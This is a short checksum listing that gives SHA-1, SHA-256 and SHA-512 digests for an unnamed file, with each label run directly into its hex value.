SHA103cc7827a30fd1dee38665c0cc993b4b533ac138
SHA256f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781
SHA5129004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0